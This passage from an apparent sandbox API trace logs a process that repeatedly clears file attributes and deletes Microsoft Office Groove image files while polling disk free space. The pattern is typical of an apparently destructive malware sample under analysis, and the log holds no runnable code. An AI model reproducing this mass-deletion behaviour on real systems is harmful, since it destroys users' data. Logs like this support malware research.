lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierUpArrow.jpg", dwFileAttributes=0x80) returned 1 [0076.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifieruparrow.jpg")) returned 1 [0076.179] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimages.jpg")) returned 1 [0076.187] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimages.jpg")) returned 1 [0076.194] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimages.jpg")) returned 1 [0076.206] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIcon.jpg", dwFileAttributes=0x80) returned 1 [0076.210] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questionicon.jpg")) returned 1 [0076.213] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg", dwFileAttributes=0x80) returned 1 [0076.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16images.jpg")) returned 1 [0076.222] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24Images.jpg", dwFileAttributes=0x80) returned 1 [0076.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24images.jpg")) returned 1 [0076.229] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupicons.jpg", dwFileAttributes=0x80) returned 1 [0076.234] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupicons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupicons.jpg")) returned 1 [0076.237] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\STOPICON.JPG", dwFileAttributes=0x80) returned 1 [0076.241] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\STOPICON.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopicon.jpg")) returned 1 [0076.245] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImage.jpg", dwFileAttributes=0x80) returned 1 [0076.249] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimage.jpg")) returned 1 [0076.252] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\VeriSignLogo.jpg", dwFileAttributes=0x80) returned 1 [0076.256] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\VeriSignLogo.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\verisignlogo.jpg")) returned 1 [0076.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.264] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimages.jpg")) returned 1 [0076.267] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImages16x16.jpg", dwFileAttributes=0x80) returned 1 [0076.271] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImages16x16.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimages16x16.jpg")) returned 1 [0076.275] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0076.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.279] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg")) returned 1 [0076.282] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.282] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.282] CoTaskMemFree (pv=0x506980) [0076.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.283] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.283] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.283] CoTaskMemFree (pv=0x506980) [0076.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.286] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.286] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.286] CoTaskMemFree (pv=0x506980) [0076.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.290] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.296] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimages.jpg")) returned 1 [0076.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg", dwFileAttributes=0x80) returned 1 [0076.304] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendarviewbuttonimages.jpg")) returned 1 [0076.308] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg", dwFileAttributes=0x80) returned 1 [0076.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimage.jpg")) returned 1 [0076.314] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.314] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.314] CoTaskMemFree (pv=0x506980) [0076.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.319] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.331] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg", dwFileAttributes=0x80) returned 1 [0076.331] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_auto.jpg")) returned 1 [0076.334] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg", dwFileAttributes=0x80) returned 1 [0076.340] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthigh.jpg")) returned 1 [0076.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg", dwFileAttributes=0x80) returned 1 [0076.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlow.jpg")) returned 1 [0076.350] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg", dwFileAttributes=0x80) returned 1 [0076.356] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehigh.jpg")) returned 1 [0076.360] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg", dwFileAttributes=0x80) returned 1 [0076.365] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoff.jpg")) returned 1 [0076.368] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg", dwFileAttributes=0x80) returned 1 [0076.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_high.jpg")) returned 1 [0076.376] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg", dwFileAttributes=0x80) returned 1 [0076.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_medium.jpg")) returned 1 [0076.389] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg", dwFileAttributes=0x80) returned 1 [0076.394] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_off.jpg")) returned 1 [0076.397] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg", dwFileAttributes=0x80) returned 1 [0076.401] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimage.jpg")) returned 1 [0076.404] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg", dwFileAttributes=0x80) returned 1 [0076.411] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagesmall.jpg")) returned 1 [0076.414] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg", dwFileAttributes=0x80) returned 1 [0076.419] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimage.jpg")) returned 1 [0076.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg", dwFileAttributes=0x80) returned 1 [0076.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagesmall.jpg")) returned 1 [0076.428] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.436] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimages.jpg")) returned 1 [0076.439] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg", dwFileAttributes=0x80) returned 1 [0076.444] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadicon.jpg")) returned 1 [0076.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg", dwFileAttributes=0x80) returned 1 [0076.454] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimages.jpg")) returned 1 [0076.457] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.457] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.457] CoTaskMemFree (pv=0x506980) [0076.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.458] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg", dwFileAttributes=0x80) returned 1 [0076.465] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericon.jpg")) returned 1 [0076.467] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.467] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: 